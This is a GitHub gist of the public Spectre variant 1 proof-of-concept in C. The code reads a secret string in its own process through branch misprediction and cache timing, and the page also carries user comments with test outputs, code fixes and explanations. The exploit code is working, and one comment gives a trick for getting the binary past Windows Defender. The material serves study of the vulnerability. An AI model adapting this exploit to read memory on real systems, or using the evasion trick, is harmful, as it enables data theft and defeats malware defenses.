-
-
Save ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6 to your computer and use it in GitHub Desktop.
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#ifdef _MSC_VER | |
#include <intrin.h> /* for rdtscp and clflush */ | |
#pragma optimize("gt",on) | |
#else | |
#include <x86intrin.h> /* for rdtscp and clflush */ | |
#endif | |
/******************************************************************** | |
Victim code. | |
********************************************************************/ | |
unsigned int array1_size = 16; | |
uint8_t unused1[64]; | |
uint8_t array1[160] = { | |
1, | |
2, | |
3, | |
4, | |
5, | |
6, | |
7, | |
8, | |
9, | |
10, | |
11, | |
12, | |
13, | |
14, | |
15, | |
16 | |
}; | |
uint8_t unused2[64]; | |
uint8_t array2[256 * 512]; | |
char * secret = "The Magic Words are Squeamish Ossifrage."; | |
uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ | |
void victim_function(size_t x) { | |
if (x < array1_size) { | |
temp &= array2[array1[x] * 512]; | |
} | |
} | |
/******************************************************************** | |
Analysis code | |
********************************************************************/ | |
#define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */ | |
/* Report best guess in value[0] and runner-up in value[1] */ | |
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) { | |
static int results[256]; | |
int tries, i, j, k, mix_i, junk = 0; | |
size_t training_x, x; | |
register uint64_t time1, time2; | |
volatile uint8_t * addr; | |
for (i = 0; i < 256; i++) | |
results[i] = 0; | |
for (tries = 999; tries > 0; tries--) { | |
/* Flush array2[256*(0..255)] from cache */ | |
for (i = 0; i < 256; i++) | |
_mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */ | |
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ | |
training_x = tries % array1_size; | |
for (j = 29; j >= 0; j--) { | |
_mm_clflush( & array1_size); | |
for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */ | |
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */ | |
/* Avoid jumps in case those tip off the branch predictor */ | |
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ | |
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */ | |
x = training_x ^ (x & (malicious_x ^ training_x)); | |
/* Call the victim! */ | |
victim_function(x); | |
} | |
/* Time reads. Order is lightly mixed up to prevent stride prediction */ | |
for (i = 0; i < 256; i++) { | |
mix_i = ((i * 167) + 13) & 255; | |
addr = & array2[mix_i * 512]; | |
time1 = __rdtscp( & junk); /* READ TIMER */ | |
junk = * addr; /* MEMORY ACCESS TO TIME */ | |
time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */ | |
if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size]) | |
results[mix_i]++; /* cache hit - add +1 to score for this value */ | |
} | |
/* Locate highest & second-highest results results tallies in j/k */ | |
j = k = -1; | |
for (i = 0; i < 256; i++) { | |
if (j < 0 || results[i] >= results[j]) { | |
k = j; | |
j = i; | |
} else if (k < 0 || results[i] >= results[k]) { | |
k = i; | |
} | |
} | |
if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) | |
break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */ | |
} | |
results[0] ^= junk; /* use junk so code above won’t get optimized out*/ | |
value[0] = (uint8_t) j; | |
score[0] = results[j]; | |
value[1] = (uint8_t) k; | |
score[1] = results[k]; | |
} | |
int main(int argc, | |
const char * * argv) { | |
size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */ | |
int i, score[2], len = 40; | |
uint8_t value[2]; | |
for (i = 0; i < sizeof(array2); i++) | |
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */ | |
if (argc == 3) { | |
sscanf(argv[1], "%p", (void * * )( & malicious_x)); | |
malicious_x -= (size_t) array1; /* Convert input value into a pointer */ | |
sscanf(argv[2], "%d", & len); | |
} | |
printf("Reading %d bytes:\n", len); | |
while (--len >= 0) { | |
printf("Reading at malicious_x = %p... ", (void * ) malicious_x); | |
readMemoryByte(malicious_x++, value, score); | |
printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear")); | |
printf("0x%02X=’%c’ score=%d ", value[0], | |
(value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]); | |
if (score[1] > 0) | |
printf("(second best: 0x%02X score=%d)", value[1], score[1]); | |
printf("\n"); | |
} | |
return (0); | |
} |
@kingsumos very nice find indeed! thank you!
It is just a little surprising... an i7-6700HQ, linux v4.9.74, no grsec, is supposedly not affected, but I don't believe that. I'll watch the repo and wait for improvements.
@kuleszdl, well yes, I just had it at hand to test ;) But, as I mention, with that mod, you can test all kinds of architectures supported by Linux.
Had to tweak a little bit.
1 - #define CACHE_HIT_THRESHOLD (80)
- Add a space between the "namespace" (whatever you wanna call it) and the argument.
2 - printf("0x%02X=’%c’ score=%d ", value[0],(value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
- Correct the formatting and instead of "?", replace by '?'.
PS: I'm not a low-level kind of guy, bear with me.
Got the expected output, which is kind of worrying, but no point to worry about it anyways. We're fucked.
Strange, works for me although I have the intel-microcode patch already installed on ubuntu: https://usn.ubuntu.com/usn/usn-3531-1/
Intel(R) Core(TM) i3 CPU 540 @ 3.07GHz
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdffb08... Success: 0x54=’T’ score=2
Reading at malicious_x = 0xffffffffffdffb09... Success: 0x68=’h’ score=2
Reading at malicious_x = 0xffffffffffdffb0a... Success: 0x65=’e’ score=7 (second best: 0x00 score=1)
Reading at malicious_x = 0xffffffffffdffb0b... Success: 0x20=’ ’ score=7 (second best: 0x87 score=1)
...
AMD A8-4500M APU with Radeon(tm) HD Graphics
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfebb8... Success: 0xFF=’�’ score=0
Reading at malicious_x = 0xffffffffffdfebb9... Success: 0xFF=’�’ score=0
Reading at malicious_x = 0xffffffffffdfebba... Success: 0xFF=’�’ score=0
Reading at malicious_x = 0xffffffffffdfebbb... Success: 0xFF=’�’ score=0
...
@rhalff The microcode does not fix within process Spectre exploitation. It only adds instructions for the OS to reset the branch predictor when switching between processes. Full mitigation of within process Spectre would require disabling branch prediction all together. Leading to Intel Atom <2013 speeds, at approximately 1/6th of the performance you have now.
@HenkPoley The example is about in-process exploits. Browsers will fix it. I am not sure if virtual machines can be exploited this way. Somehow.
There is an error in code:
#define CACHE_HIT_THRESHOLD(80) should be #define CACHE_HIT_THRESHOLD 80.
After changing #define CACHE_HIT_THRESHOLD(80)
to #define CACHE_HIT_THRESHOLD (100)
it worked on AMD A8-4500M running Ubuntu 16.04
Could someone explain what this part of code is doing?
/* Time reads. Order is lightly mixed up to prevent stride prediction /
for (i = 0; i < 256; i++)
{
mix_i = ((i * 167) + 13) & 255;
addr = &array2[mix_i * 512];
time1 = __rdtscp(&junk); / READ TIMER */
junk = addr; / MEMORY ACCESS TO TIME /
time2 = __rdtscp(&junk) - time1; / READ TIMER & COMPUTE ELAPSED TIME /
if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
results[mix_i]++; / cache hit - add +1 to score for this value */
}
Added:
#include <conio.h>
#include <ctype.h>
printf("Press Any Key to Continue\n");
_getch();
return 0;
}
End:
// waits for a keypress before quitting when compiled as windows executable .exe
i found something, if you hex edit the first byte from 4D to 00 windows defender completely ignores spectre.exe :o
Is this code supposed to work on Ubuntu 18.04 (patched)?
It's working on mine!! Scary!
This code is very nice -- cleaver ways to switch between malicious and training x values, make parameterized and still work, etc.
Question: Can someone please explain why it's required to make array2 so large? I understand the 256 value needed for each possible ASCII code in the reload section of the code, and at least 64 times that value needed for 64B cache line size. However, I noticed changing array2[256 * 512] to something like array2[256 * 64] does not work. I cannot think of an architectural or microarchitectural reason for why this might be. In gem5 simulation, if you have larger L2s, it appears an even larger array2 size is needed. However, my understanding is the clflush instruction should remove the line from the entire cache heirarchy. It almost seems like array2 must be larger than L2 size, which doesn't make sense to me since it should be evicted each attack iteration...
Kali GNU/Linux Rolling (VM)
Intel(R) Core(TM) i7-4910MQ CPU @ 2.90GHz
gcc -std=c11 -o spectre spectre.c
+++++++++++++++++++++++++++++++
A steady score of 2.
Questions => What is the meaning of "score"?
=> Why the score difference between i7 and Xeon?
Score represents how many cache hits of that value were detected. Cache hits shows likelihood that it was part of the secret charter attempting to be read. If out of all 256 ASCII values, that value is the only one to hit for 2 consecutive iterations, the code marks that as a successful read, which is why you're getting scores of 2 (high confidence). If other values also have cache hits, then it attempts to run the attack more until the value has at least (twice+5) more hits than any other value (ie, a score of 9 is required if some other value hit 2 times -- (2*2+5))
If you have the same binary, it's checking for the same timing differences to determine cache hits from misses. i7 and Xeon can have different scores due to microarchitectural differences of cache delays, prefetchers, branch predictors, etc. . The timing of cache hits and misses are processor dependent, and may need adjustments to the CACHE_HIT_THRESHOLD value. Also, if features such as SMT/HyperThreading are enabled on one, this can also impact the timing as the process runs.
Hey, they're using your code on computerphile! :D
https://www.youtube.com/watch?v=I5mRwzVvFGE
Why are the victim code and the attacker code in the same process in spectrev1?
I don't know enough about the spectre attack, I hope someone can help me with this question
Why does the spectrev1 Poc show that the victim code and the attacker code are in the same process? Shouldn't the reality be that the attacker is attacking the victim across processes
@dnffabs Because it is what it is - proof of concept, not the actual attack
@adrb: The Allwinner H3 uses cortex A7 cores, but it's good to confirm ARM's report about A7 not being affected.